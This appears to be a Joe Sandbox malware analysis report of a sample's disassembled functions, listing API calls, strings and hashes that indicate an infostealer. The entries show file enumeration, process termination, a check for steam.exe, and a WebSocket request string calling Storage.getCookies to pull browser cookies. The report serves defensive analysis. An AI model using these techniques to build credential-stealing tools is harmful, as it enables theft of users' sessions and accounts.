                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$File$Find$Heaplstrlenmemsetwsprintf$AllocateAttributesCloseCopyDeleteFirstFolderNextPathProcess
                                • String ID: %s\%s$%s\*
                                • API String ID: 4184593125-2848263008
                                • Opcode ID: 6e858667ea8aaaf40c0fa820ee338070bead074f11a85ea341fdd9f3710221b5
                                • Instruction ID: c2e8fa930570f908209a8cee4e0ce4f62203f45c075b7f814bdcdf03e56f17d7
                                • Opcode Fuzzy Hash: 6e858667ea8aaaf40c0fa820ee338070bead074f11a85ea341fdd9f3710221b5
                                • Instruction Fuzzy Hash: 60619471D10208ABCB21EF74EC49ADE77B9BF48311F0055A9FA49B7245DB35AA44CFA0
                                Function 00E5D530 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 183stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • wsprintfA.USER32 ref: 00E5D54D
                                • FindFirstFileA.KERNEL32(?,?), ref: 00E5D564
                                • StrCmpCA.SHLWAPI(?,00E717A0), ref: 00E5D584
                                • StrCmpCA.SHLWAPI(?,00E717A4), ref: 00E5D59E
                                • lstrcat.KERNEL32(?,016CF2B8), ref: 00E5D5E3
                                • lstrcat.KERNEL32(?,016CF2A8), ref: 00E5D5F7
                                • lstrcat.KERNEL32(?,?), ref: 00E5D60B
                                • lstrcat.KERNEL32(?,?), ref: 00E5D61C
                                • lstrcat.KERNEL32(?,00E71794), ref: 00E5D62E
                                • lstrcat.KERNEL32(?,?), ref: 00E5D642
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5D682
                                • lstrcpy.KERNEL32(00000000,?), ref: 00E5D6D2
                                • FindNextFileA.KERNEL32(00000000,?), ref: 00E5D737
                                • FindClose.KERNEL32(00000000), ref: 00E5D746
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$Find$Filelstrcpy$CloseFirstNextwsprintf
                                • String ID: %s\%s
                                • API String ID: 50252434-4073750446
                                • Opcode ID: 226105c9adf2001ea7bcee2448316b2b481126849486af7318135f7dae17cca9
                                • Instruction ID: c80bafc04d973109c9357c1a4f82b6c807df0a51aa2ce75b32ace310d3925a16
                                • Opcode Fuzzy Hash: 226105c9adf2001ea7bcee2448316b2b481126849486af7318135f7dae17cca9
                                • Instruction Fuzzy Hash: D8616571D102199FCB20EF74DC89ADE77B8AF48315F0099A9FA49B3241DB35AA45CF90
                                Function 00E648B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Xinvalid_argumentstd::_
                                • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                                • API String ID: 909987262-758292691
                                • Opcode ID: db886ce30756d2b497c8e22df5656a00f43a8dd3dd482291dc0bae688bfecd22
                                • Instruction ID: 68a8b1d5fef49a77099f3b3f0c046e9d9bef05bd205664bfe801ded08628d675
                                • Opcode Fuzzy Hash: db886ce30756d2b497c8e22df5656a00f43a8dd3dd482291dc0bae688bfecd22
                                • Instruction Fuzzy Hash: BBA27871E412199FDB20DFA8D8807EDBBB2EF48340F1485AAD519B7281DB315E85CF90
                                Function 00E523A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E523D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E523F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E52402
                                • lstrlen.KERNEL32(\*.*), ref: 00E5240D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5242A
                                • lstrcat.KERNEL32(00000000,\*.*), ref: 00E52436
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E5246A
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E52486
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                                • String ID: \*.*
                                • API String ID: 2567437900-1173974218
                                • Opcode ID: 1731116a61e8e5354af8c0217184df2cbeb509077b94da5f9ec65410c652fecc
                                • Instruction ID: 16c31379caa86310c0a0fbf35b6dcc15ce8cd5ab1ffee3e31a874d1a48932dd1
                                • Opcode Fuzzy Hash: 1731116a61e8e5354af8c0217184df2cbeb509077b94da5f9ec65410c652fecc
                                • Instruction Fuzzy Hash: 304192316102059BCB32EF28FC85A9E77E4AF55319F40712CFE5AB7211CB349C058BA0
                                Function 012075EC Relevance: 15.4, Strings: 11, Instructions: 1646COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: /. $>6?o$>6?o$N{'$O<}$Tk$a/$q]o$u!?0$TC$s[k
                                • API String ID: 0-3277970166
                                • Opcode ID: 7af03f5bc3619e116d836610b9c1a02f270dd2bc6c6cc44fa55dca226d02bfd0
                                • Instruction ID: 31b2f950401cb64c0b9b7ca60f73dfc069efdca65db6c57c33a013594bcf73d9
                                • Opcode Fuzzy Hash: 7af03f5bc3619e116d836610b9c1a02f270dd2bc6c6cc44fa55dca226d02bfd0
                                • Instruction Fuzzy Hash: 03B23BF3A0C2049FE3046E2DDC8567AF7E9EF94720F1A463DEAC4C3744EA7598058696
                                Function 0120ABA1 Relevance: 15.3, Strings: 11, Instructions: 1598COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 0'M$<~M$C0{{$G(~$kq}:$kq}:$oxnZ$oxnZ$1?_$Q_}$Sn
                                • API String ID: 0-4287790051
                                • Opcode ID: e8774a9b09164ed3ecd150c961b4a14fbad2ee932b84dcd5442525b86ff4e8f7
                                • Instruction ID: 5b59399b0d7ca08fbefc5099f2e8d5a58e50a00f7418b334edf5a53fea0580e9
                                • Opcode Fuzzy Hash: e8774a9b09164ed3ecd150c961b4a14fbad2ee932b84dcd5442525b86ff4e8f7
                                • Instruction Fuzzy Hash: E0B206F3A082049FE3046E2DEC8567AFBE5EF94720F1A493DEAC487744E63598058697
                                Function 0120911D Relevance: 14.2, Strings: 10, Instructions: 1667COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: +m%$Iy|$St{g$at>$o!Y$qU}$vw%$&Zv$@\_$Mz_
                                • API String ID: 0-1759963497
                                • Opcode ID: 66f9a6b2456c34e552454f63dba24ba7790ea7b66362e849df3d4dc3107e1619
                                • Instruction ID: 9201da41dcfbf21d88ecd97956b19b3a9dc5d35fc1e24b558c4e99109a9a14ba
                                • Opcode Fuzzy Hash: 66f9a6b2456c34e552454f63dba24ba7790ea7b66362e849df3d4dc3107e1619
                                • Instruction Fuzzy Hash: 22B206F3A0C6049FE304AE2DEC8567ABBE9EFD4720F1A453DE6C5C3344EA3558058696
                                Function 00E646A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00E646B9
                                • Process32First.KERNEL32(00000000,00000128), ref: 00E646C9
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E646DB
                                • StrCmpCA.SHLWAPI(?,?), ref: 00E646ED
                                • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00E64702
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 00E64711
                                • CloseHandle.KERNEL32(00000000), ref: 00E64718
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E64726
                                • CloseHandle.KERNEL32(00000000), ref: 00E64731
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                                • String ID:
                                • API String ID: 3836391474-0
                                • Opcode ID: 2d10301dea9901b52d2090ab56a59aa772ec14cd5ee8fb54c0aa40063f45586b
                                • Instruction ID: 358394ed2c6fae1cf7445d9d327605be514210581fa1914aaace2b04d82e1c4c
                                • Opcode Fuzzy Hash: 2d10301dea9901b52d2090ab56a59aa772ec14cd5ee8fb54c0aa40063f45586b
                                • Instruction Fuzzy Hash: C201C471A51114AFE7325B60EC8CFFA377CEB45B65F040189FA85F2084EF79A9508BA0
                                Function 011FEEA9 Relevance: 12.9, Strings: 9, Instructions: 1689COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: &9^w$*V_\$*l|v$Gu#P$JQ$OpZ{$\O&$m5u}$Gz
                                • API String ID: 0-4023005196
                                • Opcode ID: 5d1257935a97247b391890f4a7871d6fdc9c0cb9b16b57774354433d13b88fd8
                                • Instruction ID: d2336d549d4a5c0e027115536e4b810683d09580d9e6dc04013024724ae730db
                                • Opcode Fuzzy Hash: 5d1257935a97247b391890f4a7871d6fdc9c0cb9b16b57774354433d13b88fd8
                                • Instruction Fuzzy Hash: CCB228F3A0C204AFE7086E2DEC8567AFBE9EF94320F16453DE6C5C3344EA7558058696
                                Function 00E64610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                                Download Yara Rule
                                APIs
                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 00E64628
                                • Process32First.KERNEL32(00000000,00000128), ref: 00E64638
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E6464A
                                • StrCmpCA.SHLWAPI(?,steam.exe), ref: 00E64660
                                • Process32Next.KERNEL32(00000000,00000128), ref: 00E64672
                                • CloseHandle.KERNEL32(00000000), ref: 00E6467D
                                Strings
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.00000000012FF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000132F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000133E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388848396.000000000133F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388969574.00000000014E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388987390.00000000014E3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_1_2_e40000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                                • String ID: steam.exe
                                • API String ID: 2284531361-2826358650
                                • Opcode ID: c7e03e2b4637c33537a46e025a60323ff5f8e8db1c03eff2b279156bf2bdde25
                                • Instruction ID: 0a9ae5a21dd2f7859b2138e75b56940deef33941d306d6a579598294c8534888
                                • Opcode Fuzzy Hash: c7e03e2b4637c33537a46e025a60323ff5f8e8db1c03eff2b279156bf2bdde25
                                • Instruction Fuzzy Hash: AC018F71A011249BD7219A60EC48FEE77ACEB09364F0001D5F949E1080EBB98A948BE1
                                Function 00E54B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                                Download Yara Rule
                                APIs
                                • lstrcpy.KERNEL32(00000000,00E6CFEC), ref: 00E54B51
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54B74
                                • lstrcat.KERNEL32(00000000,00000000), ref: 00E54B7F
                                • lstrlen.KERNEL32(00E74CA8), ref: 00E54B8A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54BA7
                                • lstrcat.KERNEL32(00000000,00E74CA8), ref: 00E54BB3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 00E54BDE
                                • FindFirstFileA.KERNEL32(00000000,?), ref: 00E54BFA
                                Memory Dump Source
                                • Source File: 00000001.00000002.1388444729.0000000000E41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E40000, based on PE: true
                                • Associated: 00000001.00000002.1388428212.0000000000E40000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000E77000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ECE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000ED6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000000EEF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388444729.0000000001078000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388596614.000000000108A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.000000000108C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000001.00000002.1388610685.0000000001222000.00000040.00000001.01000000.00000003.sdmpDownload File
